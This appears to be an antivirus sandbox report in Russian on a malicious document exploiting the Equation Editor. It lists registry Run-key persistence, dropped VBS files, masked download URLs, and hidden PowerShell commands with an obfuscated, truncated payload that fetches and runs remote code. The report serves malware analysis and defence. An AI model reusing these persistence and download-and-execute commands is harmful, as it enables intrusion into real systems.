Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%LOCALAPPDATA%\Microsoft\vbc.vbs'
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\vbc.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%LOCALAPPDATA%\Microsoft\vbc.vbs'
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal oE2 $c145;$imgbxMvtyAAYzYrdrGtC='24 54 62 6F 6E 65 3D 27 2A 45 58 2...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\vbc.vbs
- %LOCALAPPDATA%\microsoft\vbc.vbs
Сетевая активность
TCP
Запросы HTTP GET
- http://ze#####consulting.com/view.vbs
- http://5.###.203.117/four/Attack.jpg
UDP
- DNS ASK ze#####consulting.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal oE2 $c145;$imgbxMvtyAAYzYrdrGtC='24 54 62 6F 6E 65 3D 27 2A 45 58 2...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%LOCALAPPDATA%\Microsoft\vbc.vbs'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "%APPDATA%\vbc.vbs" "%LOCALAPPDATA%\Microsoft\" /Y' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '<SYSTEM32>\cmd.exe' /c copy "%APPDATA%\vbc.vbs" "%LOCALAPPDATA%\Microsoft\" /Y
